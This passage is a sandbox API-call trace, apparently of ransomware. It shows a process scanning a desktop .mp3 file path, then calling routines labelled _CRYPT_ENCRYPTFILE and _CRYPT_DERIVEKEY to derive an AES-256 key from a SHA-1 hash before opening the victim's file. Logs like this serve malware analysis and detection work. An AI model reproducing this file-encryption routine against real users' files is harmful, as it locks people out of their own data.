dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Z4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BBPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BPXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PXnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nfPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fPFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PFiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FiN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iN1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jbH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bH3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="URxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RxyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xyJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yJ_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J_reG.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.310] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0162.310] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0162.310] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0162.310] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0162.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0162.310] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0162.310] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0162.310] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0162.310] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0162.312] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.312] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee7b3530, ftCreationTime.dwHighDateTime=0x1d5e6c7, ftLastAccessTime.dwLowDateTime=0x28370490, ftLastAccessTime.dwHighDateTime=0x1d5dd89, ftLastWriteTime.dwLowDateTime=0x28370490, ftLastWriteTime.dwHighDateTime=0x1d5dd89, nFileSizeHigh=0x0, nFileSizeLow=0x13156, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="URxyJ_reG.mp3", cAlternateFileName="URXYJ_~1.MP3")) returned 0x90ae18 [0162.312] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0162.312] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.312] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0162.312] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.312] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0162.312] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0162.312] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.312] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0162.312] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.312] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.312] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0162.312] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0162.312] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0162.313] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.313] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.313] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.313] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0162.313] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.313] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0162.314] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.314] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.314] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0162.314] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0162.314] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0162.314] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.314] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.314] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.314] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0162.314] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0162.314] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0162.314] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.314] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.314] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.314] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.314] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0162.314] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.314] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.314] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0162.314] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.314] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0162.314] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0162.314] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.315] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.315] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0162.315] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0162.315] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0162.315] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.315] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.315] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.315] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.315] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0162.315] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0162.315] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0162.315] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.315] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0162.315] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.315] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.315] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.315] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.315] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0162.315] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.315] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.315] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.315] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0162.315] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.315] CryptHashData (hHash=0x90af58, pbData=0x8ded80, dwDataLen=0x19, dwFlags=0x1) returned 1 [0162.315] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.315] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.316] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.316] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.316] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0162.316] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0162.316] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0162.316] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.316] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0162.316] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.316] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.316] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.316] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.316] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.316] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.316] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0162.316] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.316] CryptDestroyHash (hHash=0x90af58) returned 1 [0162.316] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.316] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.316] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.316] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.316] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.317] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ltz4mbbpxnfpfin1jbh3\\urxyj_reg.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0162.317] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.317] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0162.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0162.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0162.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0162.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0162.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0162.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0162.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) 